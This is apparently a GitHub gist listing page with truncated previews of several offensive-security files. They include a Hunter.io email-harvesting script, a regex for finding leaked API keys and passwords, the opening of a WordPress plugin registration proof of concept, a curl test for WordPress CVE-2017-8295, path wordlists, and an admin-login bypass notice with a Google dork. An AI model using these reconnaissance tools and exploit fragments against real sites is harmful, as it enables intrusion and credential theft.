This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# $Id$ | |
## | |
## | |
# This file is part of the Metasploit Framework and may be subject to | |
# redistribution and commercial restrictions. Please see the Metasploit | |
# Framework web site for more information on licensing and terms of use. | |
# http://metasploit.com/framework/ | |
## |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
total=$(curl -s "https://api.hunter.io/v2/email-count?domain=$1" | jq -r '.data.total') | |
echo "Total is $total" | |
if [ "$total" != "0" ]; then | |
for (( i=0; i<=$total; i+=100 )) | |
do | |
echo "offset $i" | |
curl -s "https://api.hunter.io/v2/domain-search?domain=$1&api_key=KEYHERE&limit=100&offset=$i" | jq -r '.data.emails[].value' >> hunter_emails.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function randomInt(min, max) { | |
return Math.floor(Math.random() * (max - min + 1)) + min; | |
} | |
jQuery(document).ready(function($){ | |
username = "poctesting"+randomInt(1,1337); | |
password_poc = "S3cr3t"+randomInt(1,1337); | |
nonce = stm_lms_nonces.stm_lms_register | |
post_data = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# It's Work to you test if the vulnerability is working | |
# use only to test your system | |
# use with responsability | |
# | |
# use method: | |
# test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST] | |
# ex: test-WP-CVE-2017-8295.sh example.com user | |
curl --write-out %{http_code} --silent --output ~/body.txt \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 | |
1 | |
11 | |
12 | |
13 | |
14 | |
15 | |
16 | |
17 | |
2 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/ | |
$$$lang-translate.service.js.aspx | |
$367-Million-Merger-Blocked.html | |
$defaultnav | |
${idfwbonavigation}.xml | |
$_news.php | |
$search2 | |
£º | |
.0 | |
/0 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠| |
0 |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Exploit Title: Supercon Direct login to admin panel without entering password | |
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
Product Description | |
——————- | |
Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
We provide world-class technology services by constantly exploring and implementing innovative | |
solutions that drive long-term value to our customers. We have been providing solutions to clients | |
across the globe for more than 5 years and boast of our extensive | |
experience on website designing and development projects. |
OlderNewer